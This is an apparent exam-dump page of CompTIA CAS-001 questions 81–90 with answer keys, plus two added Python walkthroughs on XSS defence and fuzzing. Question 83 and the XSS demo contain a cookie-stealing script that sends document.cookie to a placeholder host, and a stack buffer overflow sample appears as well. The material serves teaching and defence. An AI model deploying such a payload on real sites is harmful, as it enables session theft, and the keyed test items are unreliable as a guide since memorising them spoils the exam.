[Free] Download New Latest (November) CompTIA CAS-001 Actual Tests 81-90

Ensurepass

 

QUESTION 81

An internal employee has sold a copy of the production customer database that was being used for upgrade testing to outside parties via HTTP file upload. The Chief Information Officer (CIO) has resigned and the Chief Executive Officer (CEO) has tasked the incoming CIO with putting effective controls in place to help prevent this from occurring again in the future. Which of the following controls is the MOST effective in preventing this threat from re-occurring?

 

A.

Network-based intrusion prevention system

B.

Data loss prevention

C.

Host-based intrusion detection system

D.

Web application firewall

 

Correct Answer: B

 

 

QUESTION 82

Employees have recently requested remote access to corporate email and shared drives. Remote access has never been offered; however, the need to improve productivity and respond rapidly to customer demands means staff now require remote access. Which of the following controls will BEST protect the corporate network?

 

A.

Develop a security policy that defines remote access requirements. Perform regular audits of user accounts and reviews of system logs.

B.

Secure remote access systems to ensure shared drives are read only and access is provided through a SSL portal. Perform regular audits of user accounts and reviews of system logs.

C.

Plan and develop security policies based on the assumption that external environments have active hostile threats.

D.

Implement a DLP program to log data accessed by users connecting via remote access. Regularly perform user revalidation.

 

Correct Answer: C

 

 

QUESTION 83

Which of the following displays an example of an XSS attack?

 

A.

<SCRIPT>
document.location='http://site.comptia/cgi-bin/script.cgi?'+document.cookie
</SCRIPT>

B.

Checksums-Sha1:
7be9e9bac3882beab1abb002bb5cd2302c76c48d 1157 xfig_3.2.5.b-1.dsc
e0e3c9a9df6fac8f1536c2209025577edb1d1d9e 5770796 xfig_3.2.5.b.orig.tar.gz
d474180fbeb6955e79bfc67520ad775a87b68d80 46856 xfig_3.2.5.b-1.diff.gz
ddcba53dffd08e5d37492fbf99fe93392943c7b0 3363512 xfig-doc_3.2.5.b-1_all.deb
7773821c1a925978306d6c75ff5c579b018a2ac6 1677778 xfig-libs_3.2.5.b-1_all.deb
b26c18cfb2ee2dc071b0e3bed6205c1fc0655022 739228 xfig_3.2.5.b-1_amd64.deb

C.

<form action="/cgi-bin/login" method=post>
Username: <input type=text name=username>
Password: <input type=password name=password>
<input type=submit value=Login>

D.

#include <string.h>

char *code = "AAAABBBBCCCCDDD"; /* 15 characters plus the terminating '\0' = 16 bytes */

int main(void)
{
    char buf[8];          /* 8-byte buffer on the stack */
    strcpy(buf, code);    /* copies 16 bytes into 8: a stack buffer overflow */
    return 0;
}

 

Correct Answer: A

 

 

QUESTION 84

A newly-appointed risk management director for the IT department at Company XYZ, a major pharmaceutical manufacturer, needs to conduct a risk analysis regarding a new system which the developers plan to bring on-line in three weeks. The director begins by reviewing the thorough and well-written report from the independent contractor who performed a security assessment of the system. The report details what seems to be a manageable volume of infrequently exploited security vulnerabilities. The likelihood of a malicious attacker exploiting one of the vulnerabilities is low; however, the director still has some reservations about approving the system because of which of the following?

 

A.

The resulting impact of even one attack being realized might cripple the company financially.

B.

Government health care regulations for the pharmaceutical industry prevent the director from approving a system with vulnerabilities.

C.

The director is new and is being rushed to approve a project before an adequate assessment has been performed.

D.

The director should be uncomfortable accepting any security vulnerabilities and should find time to correct them before the system is deployed.

 

Correct Answer: A

 

 

QUESTION 85

SDLC is being used for the commissioning of a new platform. To provide an appropriate level of assurance, the security requirements that were specified at the project origin need to be carried through to implementation. Which of the following would BEST help to determine if this occurred?

 

A.

Requirements workshop

B.

Security development lifecycle (SDL)

C.

Security requirements traceability matrix (SRTM)

D.

Secure code review and penetration test

 

Correct Answer: C

 

 

QUESTION 86

A web administrator develops a web form for users to respond to the company via a web page. Which of the following should be practiced to avoid a security risk?

 

A.

SQL injection

B.

XSS scripting

C.

Click jacking

D.

Input validation

 

Correct Answer: D
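Worked example, added here and not part of the original exam material, tying question 83 to question 86. Option A of question 83 is the cookie-stealing script; option B is a Debian package checksum list, option C is an ordinary login form, and option D is a stack buffer overflow in C, none of which is XSS. The Python below shows the web-form handler from question 86 written the vulnerable way (the submitted field is pasted into the response page verbatim) beside a version that validates input on the way in and HTML-encodes it on the way out. The form fields, function names and the validation rules are assumptions for illustration; the payload is modelled on option A, with the exam's placeholder host site.comptia.

```python
import html
import re

# Constructed attacker input, modelled on option A of question 83. If the page
# reflects it unescaped, the victim's browser navigates to the attacker's
# collector URL with document.cookie appended (site.comptia is the exam's
# placeholder host, not a real collector).
XSS_PAYLOAD = (
    "<SCRIPT>"
    "document.location='http://site.comptia/cgi-bin/script.cgi?'+document.cookie"
    "</SCRIPT>"
)


def render_feedback_vulnerable(form: dict) -> str:
    """Builds the 'thank you' page by pasting submitted fields into HTML verbatim.
    This is the defect: attacker-controlled text becomes markup in the victim's browser."""
    name = form.get("name", "")
    comment = form.get("comment", "")
    return f"<p>Thanks, {name}. You wrote: {comment}</p>"


# Allow-list for the name field (assumed rule): starts with a letter, then letters,
# digits, space, period, apostrophe or hyphen, at most 64 characters in total.
NAME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9 .'-]{0,63}$")
COMMENT_MAX = 2000


class ValidationError(ValueError):
    """Raised for input outside the shape the form is designed to accept."""


def validate_form(form: dict) -> dict:
    """Input validation: reject anything outside the expected shape and return a
    cleaned copy. Length limits bound what downstream code has to cope with."""
    name = form.get("name", "")
    comment = form.get("comment", "")
    if not NAME_RE.fullmatch(name):
        raise ValidationError(
            "name: letters, digits, space, period, apostrophe or hyphen only (max 64 chars)"
        )
    if len(comment) > COMMENT_MAX or any(ord(c) < 32 and c not in "\n\t" for c in comment):
        raise ValidationError("comment: too long or contains control characters")
    return {"name": name, "comment": comment}


def render_feedback_hardened(form: dict) -> str:
    """Validate on the way in, encode on the way out. A free-text comment cannot be
    allow-listed as tightly as a name, so output encoding is what actually stops
    XSS there; validation narrows the attack surface and catches junk early."""
    try:
        clean = validate_form(form)
    except ValidationError as exc:
        return f"<p>Invalid input: {html.escape(str(exc))}</p>"
    return (
        f"<p>Thanks, {html.escape(clean['name'], quote=True)}. "
        f"You wrote: {html.escape(clean['comment'], quote=True)}</p>"
    )


def contains_script_tag(page: str) -> bool:
    """Crude check used in the demonstration: does the rendered HTML still contain
    a live <script> element (as opposed to the encoded text &lt;script&gt;)?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    attack = {"name": "x", "comment": XSS_PAYLOAD}
    print("vulnerable page runs script:", contains_script_tag(render_feedback_vulnerable(attack)))
    print("hardened page runs script:  ", contains_script_tag(render_feedback_hardened(attack)))
    print(render_feedback_hardened({"name": XSS_PAYLOAD, "comment": "hi"}))
```

The allow-list rejects the payload outright when it arrives in the name field, but the comment field has to accept angle brackets in ordinary text, so there the defence is html.escape at render time: the browser receives &lt;SCRIPT&gt; as literal characters and never executes anything. Setting the session cookie HttpOnly would additionally keep document.cookie out of reach of any script that did get through, but it does not replace output encoding.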

 

 

QUESTION 87

As part of the testing phase in the SDLC, a software developer wants to verify that an application is properly handling user error exceptions. Which of the following is the BEST tool or process for the developer to use?

 

A.

SRTM review

B.

Fuzzer

C.

Vulnerability assessment

D.

HTTP interceptor

 

Correct Answer: B
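Worked example, added here and not part of the original exam material, of what question 87 means by using a fuzzer to check error handling. A small Python fuzzer feeds a record parser a fixed set of boundary cases plus seeded random mutations of a valid record and sorts each outcome into accepted, handled (the parser raised its designed InputError) or unhandled (any other exception, which is a crash the caller never planned for). It is run against a first-cut parser that only anticipates one bad-input case, and against the same parser after the findings are fixed. The record format, function names and mutation strategy are assumptions for illustration.

```python
import random
import string


class InputError(ValueError):
    """The exception the application is designed to raise for bad user input."""


def parse_record_v1(line: str) -> dict:
    """First cut of a 'name,age' parser. It only anticipates a missing age;
    every other malformed input escapes as a raw ValueError."""
    name, age = line.split(",")          # ValueError if not exactly one comma
    if not age.strip():
        raise InputError("age missing")
    return {"name": name.strip(), "age": int(age)}   # ValueError on non-numeric age


def parse_record_v2(line: str) -> dict:
    """Same parser after the fuzz findings: every malformed input maps to InputError."""
    if not isinstance(line, str) or len(line) > 256:
        raise InputError("bad length or type")
    parts = line.split(",")
    if len(parts) != 2:
        raise InputError("expected exactly two fields")
    name, age = (p.strip() for p in parts)
    if not name or any(ord(c) < 32 for c in name):
        raise InputError("invalid name")
    if not (age.isascii() and age.isdigit()) or not 0 <= int(age) <= 150:
        raise InputError("invalid age")
    return {"name": name, "age": int(age)}


def fuzz_cases(seed: int = 1, n_random: int = 200) -> list:
    """Constructed corpus: fixed boundary cases plus seeded random mutations
    (insert / delete / replace of 1-4 characters) of a valid record."""
    rng = random.Random(seed)
    cases = [
        "", ",", ",,", "alice", "alice,", ",30", "alice,30,extra", "alice,-1",
        "alice,1e3", "alice,\uff19", "alice,30\x00", "a" * 10000 + ",30",
        "alice,99999999999999999999",
    ]
    alphabet = string.printable + "\x00\u00e9\u202e"   # include NUL and odd Unicode
    base = "alice,30"
    for _ in range(n_random):
        chars = list(base)
        for _ in range(rng.randint(1, 4)):
            op = rng.choice(("insert", "delete", "replace"))
            if op == "insert":
                chars.insert(rng.randint(0, len(chars)), rng.choice(alphabet))
            elif op == "delete" and chars:
                del chars[rng.randrange(len(chars))]
            elif chars:
                chars[rng.randrange(len(chars))] = rng.choice(alphabet)
        cases.append("".join(chars))
    return cases


def fuzz(target, cases) -> dict:
    """Run target over every case. Success and InputError are expected outcomes;
    any other exception type is recorded as an unhandled-error finding."""
    result = {"ok": 0, "handled": 0, "unhandled": []}
    for case in cases:
        try:
            target(case)
            result["ok"] += 1
        except InputError:                 # must precede Exception: it subclasses ValueError
            result["handled"] += 1
        except Exception as exc:
            result["unhandled"].append((case, type(exc).__name__))
    return result


if __name__ == "__main__":
    corpus = fuzz_cases()
    for version in (parse_record_v1, parse_record_v2):
        r = fuzz(version, corpus)
        print(f"{version.__name__}: ok={r['ok']} handled={r['handled']} "
              f"unhandled={len(r['unhandled'])}")
        for case, exc_name in r["unhandled"][:5]:
            print(f"  {exc_name} on {case!r}")
```

The point of the exercise is the classification, not the mutations: a fuzzer is only useful for this question if the harness distinguishes "the application reported bad input" from "the application fell over". Production fuzzers such as AFL or libFuzzer add coverage feedback to choose mutations, but the oracle is the same. Note that the first parser also silently accepts a negative age; that is a logic defect the exception-oriented oracle cannot see, which is why fuzzing complements rather than replaces validation tests.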

 

 

QUESTION 88

Which of the following refers to running untested code in an isolated space that prevents it from making permanent changes to the OS kernel or other data on the host machine?

 

A.

Input Validation

B.

Application hardening

C.

Code signing

D.

Application sandboxing

 

Correct Answer: D

 

 

QUESTION 89

Company Z is merging with Company A to expand its global presence and consumer base. This purchase includes several offices in different countries. To maintain strict internal security and compliance requirements, all employee activity may be monitored and reviewed. Which of the following would be the MOST likely cause for a change in this practice?

 

A.

The excessive time it will take to merge the companies' information systems.

B.

Countries may have different legal or regulatory requirements.

C.

Company A might not have adequate staffing to conduct these reviews.

D.

The companies must consolidate security policies during the merger.

 

Correct Answer: B

 

 

QUESTION 90

A new project initiative involves replacing a legacy core HR system, and is expected to touch many major operational systems in the company. A security administrator is engaged in the project to provide security consulting advice. In addition, there are database, network, application, HR, and transformation management consultants engaged on the project as well. The administrator has established the security requirements. Which of the following is the NEXT logical step?

 

A.

Document the security requirements in an email and move on to the next most urgent task.

B.

Organize a requirements workshop with the non-technical project members, namely the HR and transformation management consultants.

C.

Communicate the security requirements with all stakeholders for discussion and buy-in.

D.

Organize a requirements workshop with the technical project members, namely the database, network, and application consultants.

 

Correct Answer: C

 
